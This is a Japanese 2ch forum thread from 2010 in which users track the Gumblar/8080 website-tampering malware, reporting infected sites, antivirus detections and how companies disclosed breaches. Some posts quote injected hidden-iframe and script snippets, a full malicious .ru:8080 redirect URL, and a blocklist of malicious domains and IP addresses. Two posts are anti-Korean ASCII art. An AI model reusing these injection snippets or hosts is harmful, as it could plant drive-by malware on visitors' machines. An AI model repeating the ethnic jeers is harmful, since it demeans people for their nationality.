【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】 - 暇つぶし2ch150:名無しさん@お腹いっぱい。
10/01/20 09:13:55
最近のClamAVのMLを見る限りGumblarの亜種大杉
PDFだけでも20~30、さらにあったか・・・

151:名無しさん@お腹いっぱい。
10/01/20 09:16:55
>>128みたいなことをすると>>134のようになるので非推奨。

152:名無しさん@お腹いっぱい。
10/01/20 09:47:30
>>48
ちょw


153:名無しさん@お腹いっぱい。
10/01/20 09:50:18
>>141
Pandaクラウドになったら検知率上がったみたい


154:名無しさん@お腹いっぱい。
10/01/20 10:11:27
SSLなFTPを使ってる場合でもFTPのIDとパス抜かれることもあるんでしょうか?

155:名無しさん@お腹いっぱい。
10/01/20 12:07:42
JPCERTから確認メールが来たので。
報告した中からgoogleでURLを検索して検索数が多かった被害サイト

smartlifestyle.sakura.ne●jp/ 58500
www.iyashisalon-navi●net/ 34200 サイト全体

nakano.main●jp/ 16000
cash-you●com/ 11100

www.f-ture●com/ 9890
monde.client●jp/ 7050 monde.client●jp/monde/02.html とか数ページ
eefy.fem●jp/ 6040


156:名無しさん@お腹いっぱい。
10/01/20 13:58:14
CODE1の新型?にくっついてたけど・・
---↓ここから↓---
<iframe umcoq='HwL7BETd' src='hURLリンク(liveiframe)<)●ws/in●cgi?8 '
wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe>
---↑ここまで↑---

今度は「あふぃ」でも始めたのか?


157:名無しさん@お腹いっぱい。
10/01/20 14:30:51
mbspro2●uic●to/user/melraia●html
ここやられてる?

158:名無しさん@お腹いっぱい。
10/01/20 14:47:37
ここで報告されてるウイルスってPCサイトビューアーでも感染するのか?

159:名無しさん@お腹いっぱい。
10/01/20 14:48:53
windowsかんけーないから大丈夫

160:名無しさん@お腹いっぱい。
10/01/20 14:50:50
>>159って>>158へ?
そうですか…最近携帯にも感染するウイルスってのもいるみたいだから…

161:名無しさん@お腹いっぱい。
10/01/20 15:00:52
それとこれとは関係ないと思う

162:名無しさん@お腹いっぱい。
10/01/20 15:17:07
>>156
PDF大好きなin.cgiやin.phpはかなり前から見かける。
微妙に別系統(完全に別とは思わんけど)な気がする。

163:名無しさん@お腹いっぱい。
10/01/20 16:22:24
>>7 のポート135閉じようと思ったんだけど、
実行ファイルのパスに
C:\WINDOWS\system32\svchost -k rpcss

とあって、スタートアップの種類が自動から変えられない・・。
これは何なんでしょうか?

164:名無しさん@お腹いっぱい。
10/01/20 16:33:16
>>163
カスペルスキー使ってない?
だとしたら犯人はカスペルスキーだ。

165:名無しさん@お腹いっぱい。
10/01/20 16:34:47 BE:1056145267-PLT(12031)
>>163
>>7はルータ(ブロードバンドルータ含む)があれば普通はアクセスできないから設定不要だよ

166:名無しさん@お腹いっぱい。
10/01/20 16:36:57
【速報】JEITA(電子情報技術産業協会)のサイトが一時停止 ~ Gumblar被害か?

167:名無しさん@お腹いっぱい。
10/01/20 16:39:21
>>166
ぐぐるキャッシュに/*LGPL*/

168:名無しさん@お腹いっぱい。
10/01/20 16:39:28
ガムビルアー

169:名無しさん@お腹いっぱい。
10/01/20 16:47:29
>>164
カスペルスキーは使ってないです。ソフトはESET Smart

>>165
なるほどw 了解です

設定変えられないから、ウィルスにでも感染してるのかと心配になったよ。
回答サンクス

170:名無しさん@お腹いっぱい。
10/01/20 16:57:21
何やってんだ > 鯖缶

171:名無しさん@お腹いっぱい。
10/01/20 17:01:58
鯖缶をボッコボコにしてぐつぐつ煮込んで鯖缶缶を作りたい

172:名無しさん@お腹いっぱい。
10/01/20 17:11:05
鯖缶は製造後半年ぐらいからが食べ頃
美味いのは一年目ぐらいだな

173:名無しさん@お腹いっぱい。
10/01/20 17:16:10
つーかGENOが対策を怠ったからこうなったんだろ
あいつらは責任とって自決するべきだ
あそこまでして業務停止命令が下らないなんて世の中おかしいよ

174:名無しさん@お腹いっぱい。
10/01/20 17:36:36
またGENOとかアホか

175:名無しさん@お腹いっぱい。
10/01/20 17:41:04
癌ブラーはどこまで転移してますか?

176:名無しさん@お腹いっぱい。
10/01/20 18:30:24 BE:452633292-PLT(12031)
ドメインに使われている名称'geno'は現状に適しないと考え、新ドメインに移転することになりました。
ブックマーク等の変更をお願い致します。
URLリンク(gumblarchecker.crz.jp)
GumblarChecker2=URLリンク(gumblarchecker.crz.jp)

177:名無しさん@お腹いっぱい。
10/01/20 18:35:36
>>117
多分他にも。

というかMTのテンプレファイルもやられるっぽい。
MTで作ったサイトが全ページあうあうだった。


しかし、小さな会社だと「改ざんされてたアルよ・・・」って告知するとダメージ大きいよなぁ。
そんな理由で告知しないところが多数なんだけど、やっぱ告知すべきなのかね?

178:名無しさん@お腹いっぱい。
10/01/20 18:37:00
>>176
あー、お疲れ様です。


あ、書き忘れてたけど、avastがようやく8080スクリプトを検出してくれるようになった。
他のソフトどうよ?

179:名無しさん@お腹いっぱい。
10/01/20 18:40:59
Aviraは本体only

180:名無しさん@お腹いっぱい。
10/01/20 18:41:38
>>166
広報に凸してみました
笑ってました(何故?

URLリンク(www.jeita.or.jp)
新JEITA本部事務所〒101-0065
東京都千代田区西神田3-2-1 
千代田ファーストビル南館
総合企画部(企画グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(政策グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(調査グループ) TEL:03-5275-7255 / FAX:03-5212-8121
総合企画部(広報室) TEL:03-5275-7254 / FAX:03-5212-8123
総合企画部(安全担当) TEL:03-5275-7256 / FAX:03-5212-8121
知的基盤部 TEL:03-5275-7259 / FAX:03-5212-8122
知的基盤部(補償金管理室) TEL:03-5212-8131 / FAX:03-5212-8132
国際部 TEL:03-5275-7263 / FAX:03-5212-8122
環境部 TEL:03-5275-7257 / FAX:03-5212-8121
コンシューマ・プロダクツ部 TEL:03-5275-7260 / FAX:03-5212-8122
コンシューマ・プロダクツ部
(特定プロジェクト推進室) TEL:03-5275-7260 / FAX:03-5212-8122
インダストリ・システム部 TEL:03-5275-7261 / FAX:03-5212-8122
電子部品部
TEL:03-5275-7262 / FAX:03-5212-8122
電子デバイス部 TEL:03-5275-7258 / FAX:03-5212-8121
総務部(総務グループ) TEL:03-5275-7251 / FAX:03-5212-8121
総務部(経理グループ) TEL:03-5275-7252 / FAX:03-5212-8121
総務部(会員サービスグーループ) TEL:03-5212-8255 / FAX:03-5212-8130
関連組織[移転事務所のみ]
有限責任中間法人 ITセキュリティセンター
Information Technology Security Center
〒101-0065 東京都千代田区西神田3-2-1 千代田ファーストビル南館
TEL:03-5212-8271 / FAX:03-5212-8272

181:名無しさん@お腹いっぱい。
10/01/20 18:48:44
>>177
無能管理者のせいで客のPCを被害にあわせてるのに告知しないほうがおかしい
まあ客も馬鹿だけど隠蔽するのは悪質すぎる

182:名無しさん@お腹いっぱい。
10/01/20 18:51:38
ヒューリスティックエンジンを搭載した「avast! Free Antivirus」v5.0が公開
スレリンク(news板)

183:名無しさん@お腹いっぱい。
10/01/20 18:53:27
Gumblar: べつになんでもないこと
URLリンク(puppet.asablo.jp)

ガンブラー vs avast! - smilebanana
URLリンク(www.smilebanana.com)

この辺のブログも要チェック。

184:名無しさん@お腹いっぱい。
10/01/20 20:41:54
URLリンク(www.atmarkit.co.jp)

もうGumblarへの対応に疲れちゃったんですが……

お疲れ様です。一緒に飲みに行きましょう:-)。


www

185:名無しさん@お腹いっぱい。
10/01/20 20:46:15
>>177
MTの場合はバージョンが古く、ソフトの脆弱性を突かれて
管理PCは感染していなくても勝手に管理権限のあるIDが増やされたりした事例もあったはず。

サイト改ざん(1)「告知せず」で感染拡大の恐れ~負の連鎖を断ち切るために
URLリンク(www.so-net.ne.jp)

186:名無しさん@お腹いっぱい。
10/01/20 20:48:50
>>176
乙。
デザインが一新されて良い感じ。
右上のガンブラーAAワロスw

187:名無しさん@お腹いっぱい。
10/01/20 21:14:35
>>184
>●ガンブラーとカタカタ表記になるのがイヤなんですが……

カタカタカタカタカタカタカタカタ((((;゚Д゚)))カタカタカタカタカタカタカタカタ

188:名無しさん@お腹いっぱい。
10/01/20 21:18:20
ワロチ

189:名無しさん@お腹いっぱい。
10/01/20 21:34:03
普段ウィルスやセキュリティに無頓着な起業がこういう時にわかるからなー

190:名無しさん@お腹いっぱい。
10/01/20 21:57:15
いままでウィルスにかかっても個人なら個人の問題ですんだが、
これは個人の問題じゃないからな

191:名無しさん@お腹いっぱい。
10/01/20 22:21:43
脳豚2010使ってるんだけど
ヤホーとかで検索して
検索結果の右端のマークが緑だったら大丈夫なの?
そうならGumblarとか8080にやられていないってことでFA?

192:名無しさん@お腹いっぱい。
10/01/20 22:23:38
>>191
指標にはなるが確実とはいえない


193:名無しさん@お腹いっぱい。
10/01/20 22:24:09
>>191
全然当てにならないと思え

194:名無しさん@お腹いっぱい。
10/01/20 22:27:24
>>192-193
わかったありがとう

195:名無しさん@お腹いっぱい。
10/01/20 22:30:31
俺はjavascriptを使ってるサイトは入らないようにしてる
だから今後はjavascriptを使わないサイトが増えるだろう

そもそもjavascriptって耳とかヘソにピアスするような感じだろ
消毒しなかったら膿んでくるしね。 あとあと面倒
いらねーよ(´A`)



196:名無しさん@お腹いっぱい。
10/01/20 22:32:23
俺は去年から基本的にJavaはどちらも切ってるな

197:名無しさん@お腹いっぱい。
10/01/20 22:34:28
IE6ではやほー検索するとVB先生のチェックが入って、
サイト名の左に緑(安全)赤(危険)グレー(未チェック)のマークがあったのに、
こないだIE6からIE8にしたら、何も出なくなっちゃって、
サイト行くのが不安だ…。
けっこうあのマーク頼りにしてたのに、IE8はマークなしデフォなの?
教えてえろいひと

198:名無しさん@お腹いっぱい。
10/01/20 22:36:42
聞く相手や場所が違うことに気が付きませんか?

199:名無しさん@お腹いっぱい。
10/01/20 22:39:16
そうでした、ここガンブラスレだった。
みなさん失礼しました

200:名無しさん@お腹いっぱい。
10/01/20 22:50:42
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った
もう2chで貼られている画像リンクに興味を抱く事もないだろう

201:名無しさん@お腹いっぱい。
10/01/20 22:51:31
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った
もう2chで貼られている画像リンクに興味を抱く事もないだろう

202:名無しさん@お腹いっぱい。
10/01/20 22:53:40
専ブラのプレビュー機能ですらURL検出で反応した時に精神衛生上よくないから切った
もう2chで貼られている画像リンクに興味を抱く事もないだろう

203:名無しさん@お腹いっぱい。
10/01/20 22:53:57
大事な事なので2回(ry
じゃなくて、P2鯖の暴発ねw

204:名無しさん@お腹いっぱい。
10/01/20 23:01:07
3回言ってますぜ旦那

205:名無しさん@お腹いっぱい。
10/01/20 23:02:48
WBSで特集か、笑わせてもらうかな。

206:名無しさん@お腹いっぱい。
10/01/20 23:07:25
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
                        |         
       ____.____    | .__     いらない韓国を
     |        |        |   | |\_\     窓から投げ捨てろ
     |        | ∧_∧ |   | |  |.◎.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄

207:名無しさん@お腹いっぱい。
10/01/20 23:08:31
はじまた

208:名無しさん@お腹いっぱい。
10/01/20 23:13:41
オワタ

209:名無しさん@お腹いっぱい。
10/01/20 23:14:52
釣りかよ

210:名無しさん@お腹いっぱい。
10/01/20 23:16:44
・・・お前らおやすみ。

211:名無しさん@お腹いっぱい。
10/01/20 23:29:38
PCデポの無料診断はバスターのオンラインスキャン
URLリンク(www.trendflexsecurity.jp)
パッケージ販売やメーカー修理を目論んでいるらしい

212:名無しさん@お腹いっぱい。
10/01/20 23:43:55
ウイルスバスターのファイルスキャンはゴミなのに・・・

213:名無しさん@お腹いっぱい。
10/01/21 00:31:40
STOP刈って上がりやがった

214:213
10/01/21 00:32:22
誤爆です
ごめんなさい

215:名無しさん@お腹いっぱい。
10/01/21 01:46:18
>>184
>>166
のリンク先って何があったの?なぜ騒がれているの?

216:名無しさん@お腹いっぱい。
10/01/21 01:50:37
天下り 先の大人の事情

217:名無しさん@お腹いっぱい。
10/01/21 10:57:22
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
                        |         
       ____.____    | .__     いらない韓国を
     |        |        |   | |\_\     窓から投げ捨てろ
     |        | ∧_∧ |   | |  |.韓.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.国.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄

218:名無しさん@お腹いっぱい。
10/01/21 13:00:24
感染した場合、リカバリインストールで対処してもも問題ないのかこれ?

219:名無しさん@お腹いっぱい。
10/01/21 15:12:31
2chの専ブラはIE使ってないやつ使うだろ普通
Doe最高

220:名無しさん@お腹いっぱい。
10/01/21 16:52:21
>>117
main.html
main.php
default-filters.php

221:名無しさん@お腹いっぱい。
10/01/21 17:27:06
>>219
有名どころではギコナビやlive2chはIE仕様
特にlive2chには根強いファンが結構いる
ギコナビはとにかくシンプル且つ初心者向け設計、live2chはjaneには拡張面で負けるが使い易さを追求したタイプ

222:名無しさん@お腹いっぱい。
10/01/21 19:12:38
パルコールは今だ告知無し

223:名無しさん@お腹いっぱい。
10/01/21 19:42:47
電凸のときに嘘でも「ご連絡恐れ入ります」くらい言えない企業なんてそんなもんだろ

224:名無しさん@お腹いっぱい。
10/01/21 20:14:20
東京芸術劇場のサイトが感染したのはどのタイプ?

225:名無しさん@お腹いっぱい。
10/01/21 20:16:01
>>224
感染したのか?

226:名無しさん@お腹いっぱい。
10/01/21 20:44:03
>>224
URLリンク(www.yomiuri.co.jp)

227:名無しさん@お腹いっぱい。
10/01/21 20:54:43
>>226
公表せずに逃げきろうとしたのか
糞だな

228:名無しさん@お腹いっぱい。
10/01/21 20:57:37
感染の恐れがあるっていうか、相当な数の人間が感染してるだろw

229:名無しさん@お腹いっぱい。
10/01/21 20:59:50
updateしてたら大丈夫でそ

230:名無しさん@お腹いっぱい。
10/01/21 21:01:30
これサイトの管理者が感染してるんだから
なんとか大元特定できないのかね?

231:名無しさん@お腹いっぱい。
10/01/21 21:04:50
なんというか管理者にも閲覧者にも馬鹿が多いなあ
考え方が甘いって言うか

232:名無しさん@お腹いっぱい。
10/01/21 21:11:00
そのうち感染してないやつのほうが少なくなるんじゃないか

233:名無しさん@お腹いっぱい。
10/01/21 21:15:31
そこも日本芸術文化振興会という独立行政法人へ天下りした官僚の受け皿。

234:名無しさん@お腹いっぱい。
10/01/21 21:15:55
さすがよく腐熟してらっしゃる

235:名無しさん@お腹いっぱい。
10/01/21 21:56:36
URLリンク(www.g-factory)●org/
バスターでJS_ONLOAD.SMFがでて、avastでJS:Illredir-Cが出た

236:名無しさん@お腹いっぱい。
10/01/21 22:18:27
それ何のサイトだっけな
ゲーム?
やっべ俺逝ったことある?

237:名無しさん@お腹いっぱい。
10/01/21 22:20:57
>>235
McAfee
JS/Redirector.e

238:名無しさん@お腹いっぱい。
10/01/21 22:57:13
>>235
/*LGPL*/さんが居座ってるな

239:名無しさん@お腹いっぱい。
10/01/21 23:12:18
microsoft data access components アドオンを実行しようとしています。

240:名無しさん@お腹いっぱい。
10/01/21 23:24:59
httpコロンスラスラkitten●k-click●net/

241:名無しさん@お腹いっぱい。
10/01/21 23:29:04
>> 230

> なんとか大元特定できないのかね?

ホリプロじゃね?

Domain Information: [ドメイン情報]
[Domain Name] TGG-TS.JP
[登録者名] 株式会社 ホリプロ
[Registrant] horipro
[Name Server] ns1.secure.net
[Name Server] ns2.secure.net
[登録年月日] 2009/02/05
[有効期限] 2010/02/28
[状態] Active
[最終更新] 2010/01/04 14:19:31 (JST)



242:名無しさん@お腹いっぱい。
10/01/21 23:32:32
記事にホリプロってあるしな

243:名無しさん@お腹いっぱい。
10/01/21 23:34:53
>>235
めるすたお。

244:名無しさん@お腹いっぱい。
10/01/21 23:35:02
新型か?難読化されてないww
/*handle exception*/

hxxp://tkfd-shumatsu-gakko●jp/cat15/

avast!, Avira 送付済み

245:名無しさん@お腹いっぱい。
10/01/21 23:38:44
>>240
k-click●net
だにゃ

246:名無しさん@お腹いっぱい。
10/01/21 23:40:07
>>244
アッー!

247:名無しさん@お腹いっぱい。
10/01/21 23:41:35
>>244
これってアンチウイルスは対応できないのとちゃう?

248:名無しさん@お腹いっぱい。
10/01/21 23:46:15
>>244
当然、チェッカーにひっかからない
対応出来ないだろこれ
.ru:8080のアドレス集めるしかないのか

249:名無しさん@お腹いっぱい。
10/01/21 23:49:06
って>>245のなかに>>244になったのもある。。。

250:名無しさん@お腹いっぱい。
10/01/21 23:50:33
こわいっ
こわいいい!

251:名無しさん@お腹いっぱい。
10/01/21 23:52:05
>>247
なんで?
素人でごめんなさい。

252:名無しさん@お腹いっぱい。
10/01/21 23:54:54
>>251
普通のスクリプトになったから。。。
アドレスで反応するようになるかも。。。

253:名無しさん@お腹いっぱい。
10/01/21 23:55:07
>>23
のgenius.jpn●org/も別のスクリプトになってないか?

254:名無しさん@お腹いっぱい。
10/01/21 23:57:14
>>244
Aguseでカスペ反応でた
Trojan.JS.Iframe.hw

255:名無しさん@お腹いっぱい。
10/01/21 23:58:53
>>252
ありがと。

256:名無しさん@お腹いっぱい。
10/01/22 00:09:21
>>253 thx
avast!, Avira に提出した

257:名無しさん@お腹いっぱい。
10/01/22 00:20:53
>>245
whoisからのとでじろくにめる

258:名無しさん@お腹いっぱい。
10/01/22 00:24:49
>>244
カスペだと↓こんなん出ました

2010/01/22 0:16:23 検出しました: Trojan.JS.Iframe.hw  URLリンク(blogger-com)●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com●cn/nhl●com/google●com/

259:名無しさん@お腹いっぱい。
10/01/22 00:25:20
俺たちもいつまで無事でいられるのだろうか。

260:名無しさん@お腹いっぱい。
10/01/22 00:25:58
>>244
avast!反応した

261:名無しさん@お腹いっぱい。
10/01/22 00:26:48
>>258
これって飛ばされた先に反応してるんであってスクリプトには反応してないってことだよな

262:名無しさん@お腹いっぱい。
10/01/22 00:29:50
>>261

You are right !

だから、JSを切った状態では反応しなかったよwww

263:名無しさん@お腹いっぱい。
10/01/22 00:33:01
URLリンク(www.aguse.jp)
投げてみた。
URLリンク(www.virustotal.com)
Result: 0/40 (0%)

264:名無しさん@お腹いっぱい。
10/01/22 00:37:04
aguseのカスペのバージョンはvirustotalより新しいってことかい

265:名無しさん@お腹いっぱい。
10/01/22 00:41:36
>> 244

埋め込まれたページ全滅
URLリンク(www.virustotal.com)

次の blogger-com●fandango●com●charter-net●authentictype●ru:8080/live●com/live●com/sina●com●cn/nhl●com/google●com/ は、
わりと検出しる
URLリンク(www.virustotal.com)

その次の本編はカスペだけ
URLリンク(www.virustotal.com)

本編のPDFをとりに行ったら、とりそこなってアク禁状態...orz


266:名無しさん@お腹いっぱい。
10/01/22 00:41:36
>>264
aguseは飛び先も見てるかも

267:名無しさん@お腹いっぱい。
10/01/22 00:44:19
>>265
こちらの環境では取れないけど
:8080/pics/win.jpg は取れない?

268:名無しさん@お腹いっぱい。
10/01/22 00:52:57
>>267
DNSが引けなくなっちゃった




269:名無しさん@お腹いっぱい。
10/01/22 00:56:21
>>268
ドクペwebのリンクスキャナーも2回に1回しか捕まえられない><

270:名無しさん@お腹いっぱい。
10/01/22 00:58:15
>>269の魚拓
URLリンク(megalodon.jp)
> In file win.jpg found virus Exploit.DirectShow

271:名無しさん@お腹いっぱい。
10/01/22 01:02:41
*.ru:8080のドメインを片っ端から試してるけど、全然引けない
全滅っぽいんだけど、うちだけ?



272:名無しさん@お腹いっぱい。
10/01/22 01:04:51
>>271
DNS は引けるけど 8080 に connect できない

273:名無しさん@お腹いっぱい。
10/01/22 01:05:46
>>265>>269-270
authentictype.ru:8080は同じだけど、アドレス違うからか。。。

274:名無しさん@お腹いっぱい。
10/01/22 01:15:11
217.23.5.27
authentictype.ru
オランダ

275:名無しさん@お腹いっぱい。
10/01/22 01:17:20
8080 Gumblar
どっちもサイト改ざんされるの?

あと、最近ニュースで Gumblar と言われてるのは
このスレでいう
8080(GPL GNU CODE1) のこと?

276:名無しさん@お腹いっぱい。
10/01/22 01:23:17 BE:1207023168-PLT(12031)
>>244
対応しました
こう・・特徴が無くなると判断しづらくなるんだよなあ
JavaScriptパーサ作る必要もありそうだ
URLリンク(gumblarchecker.crz.jp)

277:名無しさん@お腹いっぱい。
10/01/22 01:23:50
>>244
とりあえずめるした。
ろりぽにもつーほー

278:名無しさん@お腹いっぱい。
10/01/22 01:23:55
>>276


279:名無しさん@お腹いっぱい。
10/01/22 01:26:01
>>277 thx


280:名無しさん@お腹いっぱい。
10/01/22 01:26:02
www●lets-juken●com
でウイルスバスターが反応した。


281:名無しさん@お腹いっぱい。
10/01/22 01:26:50
奇跡ktkr

282:名無しさん@お腹いっぱい。
10/01/22 01:27:26
>>280
泣いた

283:名無しさん@お腹いっぱい。
10/01/22 01:28:27
>>244>>258
カスペ対応しました

2010/01/22 1:22:41 検出しました: Trojan.JS.Agent.bbu  URLリンク(tkfd-shumatsu-gakko.jp)

284:名無しさん@お腹いっぱい。
10/01/22 01:29:08
>>280
nikkansports●comとか含まれてるし
ターゲットは日本か

285:名無しさん@お腹いっぱい。
10/01/22 01:29:12
ブラックリスト
補足よろろ

ampsguide.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
suesite.ru
superaguide.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru

286:名無しさん@お腹いっぱい。
10/01/22 01:32:04
>>280のsuperpropicks.ruを追加

287:280
10/01/22 01:36:42
会社のPCにバスターCorpで引っかかったので、インストール中のPCでアクセスしてみた。
WinXPSP3+Winupdate済 IE6
AdobeReader7.10
flashはWindowsのもの
gwなし
プロキシ有

プロキシのログにはなにものこってなかった。
バスターCorpでスキャンしても何も出なかった。


288:名無しさん@お腹いっぱい。
10/01/22 01:43:46
>>286
こちらの環境だと落ちてこない。。。

289:280
10/01/22 01:44:59
時間がなかったので、一回試しただけ。
何か、ドジったかな。

とりあえず、試したPCは再インストール中でタイムアップとなった。


290:名無しさん@お腹いっぱい。
10/01/22 01:59:33
Mozilla、Firefox 3.6 正式版を発表!!

新型ウイルス「ガンブラー」対策に有効なプラグインチェックツールを提供、

Firefox 3.6 の入手方法

Windows、Mac、および Linux 版が 70 か国語以上で同時リリースされる Firefox は、他のどのブラウザよりも多くのプラットフォームと言語に対応しています。
Firefox 3.6 は GetFirefox.com から無料でダウンロードできます。なお、Firefox 3.6 は 1 月 22 日 午前 2 時頃よりダウンロード可能となります。

URLリンク(mozilla.jp)

291:名無しさん@お腹いっぱい。
10/01/22 02:03:16
>>290
中身はRC2版と同じなんだってね

292:名無しさん@お腹いっぱい。
10/01/22 02:08:39
>>285
追加しますた

8080 系ブラックサイト
---------------
ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
(次に続く)

293:名無しさん@お腹いっぱい。
10/01/22 02:08:43
手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
全部IPが引けなくなってしまった

>>285
これも全部アドレスが引けない

>>286
これも引けなかった

>>274
これだけアドレス引けたけど、どしたらいい?
217.23.5.27
91.121.4.99
91.121.167.41
94.23.11.38
94.23.206.229


294:名無しさん@お腹いっぱい。
10/01/22 02:09:08
初回起動時も速くなったのかな

295:292
10/01/22 02:09:20
>>292 のつづき

theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru


296:名無しさん@お腹いっぱい。
10/01/22 02:11:02 BE:880120875-PLT(12031)
>>294
sqliteをアイドル時に自動で最適化するようになったから結構違うはず

297:名無しさん@お腹いっぱい。
10/01/22 02:11:24
>>293
アドレスはコロコロ変わるよ

298:名無しさん@お腹いっぱい。
10/01/22 02:17:35
>>296
CCleanerで小まめに最適化してる俺に隙はなかった

299:名無しさん@お腹いっぱい。
10/01/22 02:22:51
>>280
とりあえずwhoisからめるすた。

300:名無しさん@お腹いっぱい。
10/01/22 02:23:31
>>296
SQLite Optimizerお役ご免か
まあいいけど

301:名無しさん@お腹いっぱい。
10/01/22 02:35:55
特徴的な難読化アルゴリズムがかえって検出に役立ってたのに…

ここで見え見えの平文に切り替えてくるとか、何という逆転の発想w

敵もさる者よのう

302:名無しさん@お腹いっぱい。
10/01/22 02:39:29
「下手に難読化しなくても馬鹿なジャップだったら気づかないだろwwwww」とか思われてそうだし実際そうだから困る

303:名無しさん@お腹いっぱい。
10/01/22 02:40:25
難読化されてもされてなくても気づかない奴は気づかないからなぁ

304:名無しさん@お腹いっぱい。
10/01/22 02:41:56
鯖ハックして裏proxy網構築終わったからじゃね
もうru:8080はお役ご免, これからは今まで改ざんされた鯖が裏proxyになる。
これで正規のリダイレクトか不正のそれか区別出来なくなった

305:名無しさん@お腹いっぱい。
10/01/22 02:52:36
>>302
お前が馬鹿なのがよく分かる書き込みだな

306:名無しさん@お腹いっぱい。
10/01/22 03:09:01
ガンブラーマシン作った
どのサイトも安心してのぞける

307:名無しさん@お腹いっぱい。
10/01/22 03:11:44
見逃してた

>>23,>>253
さくらにつーほーしますた。

308:名無しさん@お腹いっぱい。
10/01/22 04:41:10
>>244
難読化されてる。。。

309:名無しさん@お腹いっぱい。
10/01/22 04:42:58
リファラに陥落サイトのURLを突っk(ry

310:名無しさん@お腹いっぱい。
10/01/22 04:46:43
/*Exception*/

311:名無しさん@お腹いっぱい。
10/01/22 05:37:36
>>258
URLリンク(www.virustotal.com)

312:名無しさん@お腹いっぱい。
10/01/22 05:46:33
 

313:名無しさん@お腹いっぱい。
10/01/22 05:48:26
きたね

ウィンドウズ関連ファイル直リン倶楽部 其の20
スレリンク(win板:804-808番)

314:名無しさん@お腹いっぱい。
10/01/22 05:58:02
>>311
URLリンク(labs-uploader.sabaitiba.com)
infected

315:名無しさん@お腹いっぱい。
10/01/22 09:01:32
firefoxのVista以降の保護モード対応まだ?
保護モードに対応するまでIE使い続ける

316:名無しさん@お腹いっぱい。
10/01/22 10:24:30
<script>/*Exception*/ document.write('<script src='+'h#(&t(t

ふぅ・・・

317:名無しさん@お腹いっぱい。
10/01/22 10:51:44
東京財団 週末学校
hxxp://tkfd-shumatsu-gakko●jp/cat15/
コードだけ撤去して「告知せず」かよ

Googleのキャッシュ(アクセス注意)
URLリンク(74.125.153.132)
>このページは 2010年1月10日 16:55:12 GMT に取得されたものです。
ソースに/*LGPL*/が刻印されてるしw

318:名無しさん@お腹いっぱい。
10/01/22 11:07:09
まあまあ
よく腐敗した組織だことw

319:名無しさん@お腹いっぱい。
10/01/22 11:10:04
これだけあちこちで感染してるんだから
逆にその流れに紛れてきっちり謝罪したほうが
好感度↑なのにねぇ。あほすぐる

320:名無しさん@お腹いっぱい。
10/01/22 11:14:54
URLリンク(www.tkfd.or)<)内のページ)
■対象時間
2010年1月5日19時30分ごろ~1月6日正午ごろ
■内 容
第三者による改ざんにより、当財団ホームページの一部に不正な記述がなされ、
ウイルス感染の可能性があります。感染したパソコンでは、意図しないサイトへ
誘導されてしまう可能性があります。


321:名無しさん@お腹いっぱい。
10/01/22 11:21:10
1/6に修正完了?

322:名無しさん@お腹いっぱい。
10/01/22 11:25:36
これってどうなん?

ガンブラー再燃を契機にセキュリティの基本を見直そう - インタビュー:ITpro
URLリンク(itpro.nikkeibp.co.jp)

> 各社の正規サイト改ざんに使われた手口は調査中の段階ですが、盗まれたFTPサー
> バーのログイン情報が使われた可能性は低いと考えています。

> ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃
> する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLイン
> ジェクションによるものだと推測しています。

323:名無しさん@お腹いっぱい。
10/01/22 11:25:40
「ホリプロ」サイト、ガンブラー感染公表せず
URLリンク(www.yomiuri.co.jp)
東京都は21日、東京芸術劇場(豊島区)の演目を案内する専用サイト
「東京芸術劇場チケットサービス」が改ざんされ、新型コンピューターウイルス「ガンブラー」に感染していたと発表した。

 現時点で個人情報流出などの被害報告はないという。サイト運営業者は今月9日に感染に気付いていたが公表せず
サイトが閉鎖されたのは19日になってからだった。先月17日以降に閲覧した人は感染の恐れがあるといい
この間のアクセス件数は2万3181件。

 発表によると、同劇場では今月19日、サイト利用者から「ウイルスに感染しているのではないか」との連絡を受け、サイトを閉鎖。
しかし、サイト運営を委託されている芸能事務所・ホリプロ(東京・目黒区)はこれより前の今月9日に、別の利用者からの指摘で感染に気付いていたが
公表していなかったという。

 同社は「担当者が重大性を認識しておらず、改ざん場所を復旧させただけで、公表しなかった。深く反省している」としている。


324:名無しさん@お腹いっぱい。
10/01/22 11:33:13
>>322
固定コンテンツしか使ってないサイトもたくさんやられてるじゃん
だから普通にftpアカウント盗まれてるでしょ?

